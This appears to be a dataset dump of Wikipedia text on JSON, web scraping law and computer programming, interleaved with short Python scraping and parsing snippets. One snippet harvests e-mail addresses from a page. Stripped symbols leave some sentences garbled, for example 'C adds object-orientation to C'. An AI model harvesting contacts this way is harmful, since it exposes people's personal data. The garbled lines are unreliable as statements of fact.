the early 2000s. 8 Crockford first specified and popularized the JSON format. 1 The acronym originated at State Software, a company cofounded by Crockford and others in March 2001. The cofounders agreed to build a system that used standard browser capabilities and provided an abstraction layer for Web developers to create stateful Web applications that had a persistent duplex connection to a Web server by holding two Hypertext Transfer Protocol (HTTP) connections open and recycling them before standard browser time-outs if no further data were exchanged. The cofounders had a round-table discussion and voted on whether to call the data format JSML (JavaScript Markup Language) or JSON (JavaScript Object Notation), as well as under what license type to make it available. The JSON.org 9 website was launched in 2001. In December 2005, Yahoo began offering some of its Web services in JSON. 10 A precursor to the JSON libraries was used in a children's digital asset trading game project named Cartoon Orbit at Communities.com (the State cofounders had all worked at this company previously) for Cartoon Network, which used a browser-side plug-in with a proprietary messaging format to manipulate DHTML elements (this system is also owned by 3DO). 
Upon discovery of early Ajax capabilities, digiGroups, Noosh, and others used frames to pass information into the user browsers' visual field without refreshing a Web application's visual context, realizing real-time rich Web applications using only the standard HTTP, HTML, and JavaScript capabilities of Netscape 4.0.5 and Internet Explorer 5 . Crockford then found that JavaScript could be used as an object-based messaging format for such a system. The system was sold to Sun Microsystems, Amazon.com, and EDS. JSON was based on a subset of the JavaScript scripting language (specifically, Standard ECMA 262 3rd Edition—December 1999 11 ) and is commonly used with JavaScript, but it is a language-independent data format. Code for parsing and generating JSON data is readily available in many programming languages. JSON's website lists JSON libraries by language. In October 2013, Ecma International published the first edition of its JSON standard ECMA 404. 4 That same year, RFC 7158 used ECMA 404 as a reference. In 2014, RFC 7159 became the main reference for JSON's Internet uses, superseding RFC 4627 and RFC 7158 (but preserving ECMA 262 and ECMA 404 as main references). In November 2017, ISO IEC JTC 1 SC 22 published ISO IEC 21778:2017 2 as an international standard. On December 13, 2017, the Internet Engineering Task Force obsoleted RFC 7159 when it published RFC 8259, which is the current version of the Internet Standard STD 90. 12 13 Crockford added a clause to the JSON license stating, "The Software shall be used for Good, not Evil", in order to open-source the JSON libraries while mocking corporate lawyers and those who are overly pedantic. On the other hand, this clause led to license compatibility problems of the JSON license with other open-source licenses since open-source software and free software usually imply no restrictions on the purpose of use. 14 The following example shows a possible JSON representation describing a person. Although Crockford originally asserted that JSON is a strict subset of JavaScript and ECMAScript, 15 his specification actually allows valid JSON documents that are not valid JavaScript; JSON allows the Unicode line terminators U 2028 LINE SEPARATOR and U 2029 PARAGRAPH SEPARATOR to appear unescaped in quoted strings, while ECMAScript 2018 and older do not. 16 17 This is a consequence of JSON disallowing only "control characters". For maximum portability, these characters should be backslash-escaped. JSON exchange in an open ecosystem must be encoded in UTF 8. 6 The encoding supports the full Unicode character set, including those characters outside the Basic Multilingual Plane (U 0000 to U FFFF). However, if escaped, those characters must be written using UTF 16 surrogate pairs. For example, to include the Emoji character U 1F610 NEUTRAL FACE in JSON: JSON became a strict subset of ECMAScript as of the language's 2019 revision. 17 18 JSON's basic data types are: Whitespace is allowed and ignored around or between syntactic elements (values and punctuation, but not within a string value). Four specific characters are considered whitespace for this purpose: space, horizontal tab, line feed, and carriage return. In particular, the byte order mark must not be generated by a conforming implementation (though it may be accepted when parsing JSON). JSON does not provide syntax for comments. 
21 Early versions of JSON (such as specified by RFC 4627) required that a valid JSON text must consist of only an object or an array type, which could contain other types within them. This restriction was dropped in RFC 7158, where a JSON text was redefined as any serialized value. Numbers in JSON are agnostic with regard to their representation within programming languages. While this allows for numbers of arbitrary precision to be serialized, it may lead to portability issues. For example, since no differentiation is made between integer and floating-point values, some implementations may treat 42, 42.0, and 4.2E 1 as the same number, while others may not. The JSON standard makes no requirements regarding implementation details such as overflow, underflow, loss of precision, rounding, or signed zeros, but it does recommend expecting no more than IEEE 754 binary64 precision for "good interoperability". There is no inherent precision loss in serializing a machine-level binary representation of a floating-point number (like binary64) into a human-readable decimal representation (like numbers in JSON) and back since there exist published algorithms to do this exactly and optimally. 22 Comments were intentionally excluded from JSON. In 2012, Douglas Crockford described his design decision thus: "I removed comments from JSON because I saw people were using them to hold parsing directives, a practice which would have destroyed interoperability. 21 JSON disallows "trailing commas", a comma after the last value inside a data structure. 23 Trailing commas are a common feature of JSON derivatives to improve ease of use. 24 RFC 8259 describes certain aspects of JSON syntax that, while legal per the specifications, can cause interoperability problems. In 2015, the IETF published RFC 7493, describing the "I-JSON Message Format", a restricted profile of JSON that constrains the syntax and processing of JSON to avoid, as much as possible, these interoperability issues. While JSON provides a syntactic framework for data interchange, unambiguous data interchange also requires agreement between producer and consumer on the semantics of specific use of the JSON syntax. 25 One example of where such an agreement is necessary is the serialization of data types that are not part of the JSON standard, for example, dates and regular expressions. The official MIME type for JSON text is application json, 26 and most modern implementations have adopted this. Legacy MIME types include text json, text x-json, and text javascript. 27 JSON Schema specifies a JSON-based format to define the structure of JSON data for validation, documentation, and interaction control. It provides a contract for the JSON data required by a given application and how that data can be modified. 28 JSON Schema is based on the concepts from XML Schema (XSD) but is JSON-based. As in XSD, the same serialization deserialization tools can be used both for the schema and data, and it is self-describing. It is specified in an Internet Draft at the IETF, with the latest version as of 2024 being "Draft 2020 12". 29 There are several validators available for different programming languages, 30 each with varying levels of conformance. The standard filename extension is .json. 31 The JSON standard does not support object references, but an IETF draft standard for JSON-based object references exists. 32 JSON-RPC is a remote procedure call (RPC) protocol built on JSON, as a replacement for XML-RPC or SOAP. 
It is a simple protocol that defines only a handful of data types and commands. JSON-RPC lets a system send notifications (information to the server that does not require a response) and multiple calls to the server that can be answered out of order. Asynchronous JavaScript and JSON (or AJAJ) refers to the same dynamic web page methodology as Ajax, but instead of XML, JSON is the data format. AJAJ is a web development technique that provides for the ability of a web page to request new data after it has loaded into the web browser. Typically, it renders new data from the server in response to user actions on that web page. For example, what the user types into a search box, client-side code then sends to the server, which immediately responds with a drop-down list of matching database items. JSON has seen ad hoc usage as a configuration language. However, it does not support comments. In 2012, Douglas Crockford, JSON creator, had this to say about comments in JSON when used as a configuration language: "I know that the lack of comments makes some people sad, but it shouldn't. Suppose you are using JSON to keep configuration files, which you would like to annotate. Go ahead and insert all the comments you like. Then pipe it through JSMin 33 before handing it to your JSON parser. 21 MongoDB uses JSON-like data for its document-oriented database. Some relational databases, such as PostgreSQL and MySQL, have added support for native JSON data types. This allows developers to store JSON data directly in a relational database without having to convert it to another data format. JSON being a subset of JavaScript can lead to the misconception that it is safe to pass JSON texts to the JavaScript eval() function. This is not safe, due to certain valid JSON texts, specifically those containing U 2028 LINE SEPARATOR or U 2029 PARAGRAPH SEPARATOR, not being valid JavaScript code until JavaScript specifications were updated in 2019, and so older engines may not support it. 34 To avoid the many pitfalls caused by executing arbitrary code from the Internet, a new function, JSON.parse(), was first added to the fifth edition of ECMAScript, 35 which as of 2017 is supported by all major browsers. For non-supported browsers, an API-compatible JavaScript library is provided by Douglas Crockford. 36 In addition, the TC39 proposal "Subsume JSON" made ECMAScript a strict JSON superset as of the language's 2019 revision. 17 18 Various JSON parser implementations have suffered from denial-of-service attack and mass assignment vulnerability. 37 38 JSON is promoted as a low-overhead alternative to XML as both of these formats have widespread support for creation, reading, and decoding in the real-world situations where they are commonly used. 39 Apart from XML, examples could include CSV and supersets of JSON. Google Protocol Buffers can fill this role, although it is not a data interchange language. CBOR has a superset of the JSON data types, but it is not text-based. XML has been used to describe structured data and to serialize objects. Various XML-based protocols exist to represent the same kind of data structures as JSON for the same kind of data interchange purposes. Data can be encoded in XML in several ways. The most expansive form using tag pairs results in a much larger (in character count) representation than JSON, but if data is stored in attributes and 'short tag' form where the closing tag is replaced with , the representation is often about the same size as JSON or just a little larger. 
However, an XML attribute can only have a single value and each attribute can appear at most once on each element. XML separates "data" from "metadata" (via the use of elements and attributes), while JSON does not have such a concept. Another key difference is the addressing of values. JSON has objects with a simple "key" to "value" mapping, whereas in XML addressing happens on "nodes", which all receive a unique ID via the XML processor. Additionally, the XML standard defines a common attribute xml:id, that can be used by the user, to set an ID explicitly. XML tag names cannot contain any of the characters () , ; ? , nor a space character, and cannot begin with , ., or a numeric digit, whereas JSON keys can (even if quotation mark and backslash must be escaped). 40 XML values are strings of characters, with no built-in type safety. XML has the concept of schema, that permits strong typing, user-defined types, predefined tags, and formal structure, allowing for formal validation of an XML stream. JSON has several types built-in and has a similar schema concept in JSON Schema. XML supports comments, while JSON does not. 41 21 Support for comments and other features have been deemed useful, which has led to several nonstandard JSON supersets being created. Among them are HJSON, 42 HOCON, and JSON5 (which despite its name, is not the fifth version of JSON). 43 44 YAML version 1.2 is a superset of JSON; prior versions were not strictly compatible. For example, escaping a slash with a backslash is valid in JSON, but was not valid in YAML. 45 YAML supports comments, while JSON does not. 45 43 21 CSON ("CoffeeScript Object Notation") uses significant indentation, unquoted keys, and assumes an outer object declaration. It was used for configuring GitHub's Atom text editor. 46 47 48 There is also an unrelated project called CSON ("Cursive Script Object Notation") that is more syntactically similar to JSON. 49 HOCON ("Human-Optimized Config Object Notation") is a format for human-readable data, and a superset of JSON. 50 The uses of HOCON are: JSON5 ("JSON5 Data Interchange Format") is an extension of JSON syntax that just like JSON is also valid JavaScript syntax. The specification was started in 2012 and finished in 2018 with version 1.0.0. 61 The main differences to JSON syntax are: JSON5 syntax is supported in some software as an extension of JSON syntax, for instance in SQLite. 62 JSONC (JSON with Comments) is a subset of JSON5 used in Microsoft's Visual Studio Code: 63 Several serialization formats have been built on or from the JSON specification. Examples include |
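The JSON-versus-XML comparison in the passage above can be made concrete with the two standard-library parsers; a short sketch using an invented "person" record to show the attribute-based short-tag form next to the JSON object form:

import json
import xml.etree.ElementTree as ET

json_text = '{"person": {"firstName": "Ada", "lastName": "Lovelace"}}'
xml_text = '<person firstName="Ada" lastName="Lovelace"/>'

# JSON: keys map directly to typed values.
person = json.loads(json_text)["person"]
print(person["firstName"], person["lastName"])

# XML: attributes hold single string values on a node, with no built-in typing.
root = ET.fromstring(xml_text)
print(root.attrib["firstName"], root.attrib["lastName"])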
446 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#India | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
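The fetch-then-extract workflow described above maps directly onto the requests and BeautifulSoup libraries installed at the top of this notebook; a minimal sketch, using example.com as a placeholder target:

import requests
from bs4 import BeautifulSoup

# Fetching: download the page, much as a browser would.
response = requests.get("https://example.com", timeout=10)

# Extraction: parse the HTML and copy out the pieces of interest.
soup = BeautifulSoup(response.text, "html5lib")
heading = soup.find("h1")
links = [a["href"] for a in soup.find_all("a", href=True)]
print("heading:", heading.get_text(strip=True) if heading else None)
print("links:", links)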
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
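The grep/regular-expression approach mentioned at the start of this passage is easy to sketch in Python; the pattern and target URL below are illustrative only, and a real HTML parser is usually more robust than regular expressions for anything structural:

import re
import requests

# Fetch a page and pull out e-mail-like strings with a regular expression,
# the simplest form of the text-pattern scraping described above.
html = requests.get("https://example.com", timeout=10).text
email_pattern = r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}"
print(sorted(set(re.findall(email_pattern, html))))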
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
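Scrapy, one of the tools listed above, structures a scraper as a "spider" class; a minimal sketch against quotes.toscrape.com, a site commonly used for scraping demonstrations (the CSS selectors are specific to that site and are assumptions here):

import scrapy

class QuotesSpider(scrapy.Spider):
    # Scrapy fetches each URL in start_urls and passes the response to parse().
    name = "quotes"
    start_urls = ["https://quotes.toscrape.com/"]

    def parse(self, response):
        for quote in response.css("div.quote"):
            yield {
                "text": quote.css("span.text::text").get(),
                "author": quote.css("small.author::text").get(),
            }

# Run from a shell with, for example:
#   scrapy runspider quotes_spider.py -o quotes.json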
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
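From the scraper's side, the administrative measures mentioned above are usually met by scraping politely: honouring robots.txt and rate-limiting requests. A minimal sketch using the standard-library robots.txt parser; the site, paths, and user-agent string are placeholders:

import time
import requests
from urllib.robotparser import RobotFileParser

BASE = "https://example.com"              # placeholder site
USER_AGENT = "example-research-bot/1.0"   # placeholder user agent

robots = RobotFileParser(BASE + "/robots.txt")
robots.read()                             # fetch and parse robots.txt

for path in ["/", "/about"]:              # hypothetical paths
    if robots.can_fetch(USER_AGENT, BASE + path):
        requests.get(BASE + path, headers={"User-Agent": USER_AGENT}, timeout=10)
    time.sleep(2)                         # pause between requests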
447 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Computer_programming | Computer programming or coding is the composition of sequences of instructions, called programs, that computers can follow to perform tasks. 1 2 It involves designing and implementing algorithms, step-by-step specifications of procedures, by writing code in one or more programming languages. Programmers typically use high-level programming languages that are more easily intelligible to humans than machine code, which is directly executed by the central processing unit. Proficient programming usually requires expertise in several different subjects, including knowledge of the application domain, details of programming languages and generic code libraries, specialized algorithms, and formal logic. Auxiliary tasks accompanying and related to programming include analyzing requirements, testing, debugging (investigating and fixing problems), implementation of build systems, and management of derived artifacts, such as programs' machine code. While these are sometimes considered programming, often the term software development is used for this larger overall process with the terms programming, implementation, and coding reserved for the writing and editing of code per se. Sometimes software development is known as software engineering, especially when it employs formal methods or follows an engineering design process. Programmable devices have existed for centuries. As early as the 9th century, a programmable music sequencer was invented by the Persian Banu Musa brothers, who described an automated mechanical flute player in the Book of Ingenious Devices. 3 4 In 1206, the Arab engineer Al-Jazari invented a programmable drum machine where a musical mechanical automaton could be made to play different rhythms and drum patterns, via pegs and cams. 5 6 In 1801, the Jacquard loom could produce entirely different weaves by changing the "program" a series of pasteboard cards with holes punched in them. Code-breaking algorithms have also existed for centuries. In the 9th century, the Arab mathematician Al-Kindi described a cryptographic algorithm for deciphering encrypted code, in A Manuscript on Deciphering Cryptographic Messages. He gave the first description of cryptanalysis by frequency analysis, the earliest code-breaking algorithm. 7 The first computer program is generally dated to 1843 when mathematician Ada Lovelace published an algorithm to calculate a sequence of Bernoulli numbers, intended to be carried out by Charles Babbage's Analytical Engine. 8 However, Charles Babbage himself, wrote his first program for the AE in 1837. 9 10 In the 1880s, Herman Hollerith invented the concept of storing data in machine-readable form. 11 Later a control panel (plug board) added to his 1906 Type I Tabulator allowed it to be programmed for different jobs, and by the late 1940s, unit record equipment such as the IBM 602 and IBM 604, were programmed by control panels in a similar way, as were the first electronic computers. However, with the concept of the stored-program computer introduced in 1949, both programs and data were stored and manipulated in the same way in computer memory. 12 Machine code was the language of early programs, written in the instruction set of the particular machine, often in binary notation. 
Assembly languages were soon developed that let the programmer specify instructions in a text format (e.g., ADD X, TOTAL), with abbreviations for each operation code and meaningful names for specifying addresses. However, because an assembly language is little more than a different notation for a machine language, two machines with different instruction sets also have different assembly languages. High-level languages made the process of developing a program simpler and more understandable, and less bound to the underlying hardware. The first compiler related tool, the A 0 System, was developed in 1952 13 by Grace Hopper, who also coined the term 'compiler'. 14 15 FORTRAN, the first widely used high-level language to have a functional implementation, came out in 1957, 16 and many other languages were soon developed—in particular, COBOL aimed at commercial data processing, and Lisp for computer research. These compiled languages allow the programmer to write programs in terms that are syntactically richer, and more capable of abstracting the code, making it easy to target varying machine instruction sets via compilation declarations and heuristics. Compilers harnessed the power of computers to make programming easier 16 by allowing programmers to specify calculations by entering a formula using infix notation. Programs were mostly entered using punched cards or paper tape. By the late 1960s, data storage devices and computer terminals became inexpensive enough that programs could be created by typing directly into the computers. Text editors were also developed that allowed changes and corrections to be made much more easily than with punched cards. Whatever the approach to development may be, the final program must satisfy some fundamental properties. The following properties are among the most important: 17 18 Using automated tests and fitness functions can help to maintain some of the aforementioned attributes. 20 In computer programming, readability refers to the ease with which a human reader can comprehend the purpose, control flow, and operation of source code. It affects the aspects of quality above, including portability, usability and most importantly maintainability. Readability is important because programmers spend the majority of their time reading, trying to understand, reusing, and modifying existing source code, rather than writing new source code. Unreadable code often leads to bugs, inefficiencies, and duplicated code. A study found that a few simple readability transformations made code shorter and drastically reduced the time to understand it. 21 Following a consistent programming style often helps readability. However, readability is more than just programming style. Many factors, having little or nothing to do with the ability of the computer to efficiently compile and execute the code, contribute to readability. 22 Some of these factors include: The presentation aspects of this (such as indents, line breaks, color highlighting, and so on) are often handled by the source code editor, but the content aspects reflect the programmer's talent and skills. Various visual programming languages have also been developed with the intent to resolve readability concerns by adopting non-traditional approaches to code structure and display. Integrated development environments (IDEs) aim to integrate all such help. Techniques like Code refactoring can enhance readability. 
The academic field and the engineering practice of computer programming are both largely concerned with discovering and implementing the most efficient algorithms for a given class of problems. For this purpose, algorithms are classified into orders using the so-called Big O notation, which expresses resource use, such as execution time or memory consumption, in terms of the size of an input. Expert programmers are familiar with a variety of well-established algorithms and their respective complexities and use this knowledge to choose algorithms that are best suited to the circumstances. The first step in most formal software development processes is requirements analysis, followed by testing to determine value modeling, implementation, and failure elimination (debugging). There exist a lot of different approaches for each of those tasks. One approach popular for requirements analysis is Use Case analysis. Many programmers use forms of Agile software development where the various stages of formal software development are more integrated together into short cycles that take a few weeks rather than years. There are many approaches to the Software development process. Popular modeling techniques include Object-Oriented Analysis and Design (OOAD) and Model-Driven Architecture (MDA). The Unified Modeling Language (UML) is a notation used for both the OOAD and MDA. A similar technique used for database design is Entity-Relationship Modeling (ER Modeling). Implementation techniques include imperative languages (object-oriented or procedural), functional languages, and logic languages. It is very difficult to determine what are the most popular modern programming languages. Methods of measuring programming language popularity include: counting the number of job advertisements that mention the language, 23 the number of books sold and courses teaching the language (this overestimates the importance of newer languages), and estimates of the number of existing lines of code written in the language (this underestimates the number of users of business languages such as COBOL). Some languages are very popular for particular kinds of applications, while some languages are regularly used to write many different kinds of applications. For example, COBOL is still strong in corporate data centers 24 often on large mainframe computers, Fortran in engineering applications, scripting languages in Web development, and C in embedded software. Many applications use a mix of several languages in their construction and use. New languages are generally designed around the syntax of a prior language with new functionality added, (for example C adds object-orientation to C, and Java adds memory management and bytecode to C , but as a result, loses efficiency and the ability for low-level manipulation). Debugging is a very important task in the software development process since having defects in a program can have significant consequences for its users. Some languages are more prone to some kinds of faults because their specification does not require compilers to perform as much checking as other languages. Use of a static code analysis tool can help detect some possible problems. Normally the first step in debugging is to attempt to reproduce the problem. This can be a non-trivial task, for example as with parallel processes or some unusual software bugs. Also, specific user environment and usage history can make it difficult to reproduce the problem. 
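The Big O discussion earlier in this passage can be illustrated with a small Python comparison of a linear scan against a binary search on sorted data; a sketch using the standard library only:

from bisect import bisect_left

data = list(range(1_000_000))   # sorted input
target = 987_654

# Linear search: O(n) comparisons in the worst case.
linear_index = next(i for i, value in enumerate(data) if value == target)

# Binary search on sorted input: O(log n) comparisons.
binary_index = bisect_left(data, target)

print(linear_index, binary_index)   # both print 987654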
